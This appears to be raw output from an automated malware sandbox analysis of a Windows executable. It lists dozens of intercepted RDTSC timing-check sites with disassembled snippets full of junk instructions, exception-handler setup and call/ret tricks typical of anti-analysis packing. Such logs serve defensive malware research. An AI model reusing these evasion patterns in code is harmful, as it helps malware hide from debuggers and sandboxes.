          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119300D second address: 1193058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jp 00007F4F28CDCB74h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push ecx 0x00000014 jp 00007F4F28CDCB66h 0x0000001a pop ecx 0x0000001b jmp 00007F4F28CDCB79h 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193209 second address: 1193210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156317 second address: 115631B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115631B second address: 1156321 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A3B1 second address: 119A3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB78h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A3D4 second address: 119A3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F296427AFh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199A67 second address: 1199A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jno 00007F4F28CDCB66h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jg 00007F4F28CDCB83h 0x00000014 jmp 00007F4F28CDCB77h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199C1F second address: 1199C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F296427A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4F296427AFh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199C3C second address: 1199C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199F9F second address: 1199FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199FA6 second address: 1199FB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F4F28CDCB66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C195 second address: 119C199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CD95 second address: 119CDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CDE0 second address: 119CE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], ebx 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007F4F296427B1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4F296427ADh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119D058 second address: 119D062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4F28CDCB66h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119E1AE second address: 119E1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EB02 second address: 119EB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB6Fh 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007F4F28CDCB74h 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F4F28CDCB6Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F4F28CDCB66h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119E1B9 second address: 119E1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119E1BE second address: 119E1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FFA3 second address: 119FFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A09A7 second address: 11A09B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A09B6 second address: 11A09BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1251 second address: 11A1257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1257 second address: 11A125C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A125C second address: 11A1282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F4F28CDCB66h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1282 second address: 11A1288 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5CD3 second address: 11A5CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7234 second address: 11A723A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A723A second address: 11A723E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A821C second address: 11A8231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AA16D second address: 11AA171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AA171 second address: 11AA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AA177 second address: 11AA181 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F28CDCB6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A74B2 second address: 11A74B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A944E second address: 11A94DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 jnp 00007F4F28CDCB6Ch 0x0000000f adc bl, 0000000Bh 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov bh, FBh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F4F28CDCB68h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov ebx, 29814712h 0x00000041 mov eax, dword ptr [ebp+122D099Dh] 0x00000047 jng 00007F4F28CDCB66h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007F4F28CDCB68h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 xor dword ptr [ebp+122D2FE8h], edx 0x0000006f push eax 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB50E second address: 11AB514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD4CB second address: 11AD572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jne 00007F4F28CDCB6Ch 0x00000013 movsx ebx, cx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov edi, 667922DAh 0x00000022 mov ebx, dword ptr [ebp+122D1DF1h] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F4F28CDCB68h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jne 00007F4F28CDCB71h 0x0000004f mov eax, dword ptr [ebp+122D0DADh] 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F4F28CDCB68h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f mov bx, di 0x00000072 mov dword ptr [ebp+122DB8A8h], edi 0x00000078 push FFFFFFFFh 0x0000007a nop 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD572 second address: 11AD593 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4F296427AFh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD593 second address: 11AD59D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F28CDCB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B02A2 second address: 11B02A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE486 second address: 11AE48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE48A second address: 11AE4A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4F296427ABh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4A1 second address: 11AE4B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4B5 second address: 11AE4BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4BB second address: 11AE4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B63E7 second address: 11B63F1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F296427AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6A73 second address: 11B6A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6A79 second address: 11B6A83 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F296427ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6A83 second address: 11B6A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F4F28CDCB6Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA47D second address: 11BA491 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4F296427AAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA491 second address: 11BA495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151194 second address: 1151198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151198 second address: 11511C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4F28CDCB73h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511C2 second address: 11511C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511C8 second address: 11511E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4F28CDCB75h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11511E7 second address: 1151205 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F296427A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151205 second address: 1151209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C62AB second address: 11C62B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4F296427A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C62B7 second address: 11C62BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CC90D second address: 11CC912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCB96 second address: 11CCB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCB9E second address: 11CCBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnl 00007F4F296427AAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jne 00007F4F296427A6h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCBB9 second address: 11CCBBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCD4D second address: 11CCD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F296427B3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4DC7 second address: 11D4DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4DCB second address: 11D4E03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B6h 0x00000007 jo 00007F4F296427A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F4F296427B5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D50C7 second address: 11D50CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D54FA second address: 11D5500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5500 second address: 11D5516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F4F28CDCB6Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5516 second address: 11D551C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5660 second address: 11D566C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D566C second address: 11D5676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5BE5 second address: 11D5BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6023 second address: 11D6042 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F296427ACh 0x00000008 jmp 00007F4F296427ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D492A second address: 11D492E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D492E second address: 11D493A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4F296427A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D493A second address: 11D4962 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4F28CDCB7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4F28CDCB66h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF684 second address: 11DF68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF68A second address: 11DF68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF80A second address: 11DF80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF80E second address: 11DF812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF812 second address: 11DF81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF81D second address: 11DF823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E058D second address: 11E0592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5E5D second address: 11E5E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4CFF second address: 11E4D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4D16 second address: 11E4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4D1C second address: 11E4D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3E03 second address: 11A3E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3E07 second address: 11A3E23 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F296427AEh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4295 second address: 11A429A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A429A second address: 11A430F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F4F296427A6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push edi 0x00000011 jmp 00007F4F296427AEh 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F4F296427B3h 0x00000020 pop eax 0x00000021 call 00007F4F296427B3h 0x00000026 mov dword ptr [ebp+122D1CA2h], edx 0x0000002c pop ecx 0x0000002d mov dword ptr [ebp+1247CF8Fh], edi 0x00000033 push 3BA0BBB4h 0x00000038 pushad 0x00000039 jmp 00007F4F296427B3h 0x0000003e push eax 0x0000003f push edx 0x00000040 push edi 0x00000041 pop edi 0x00000042 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4428 second address: 11A442E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A442E second address: 11A4433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
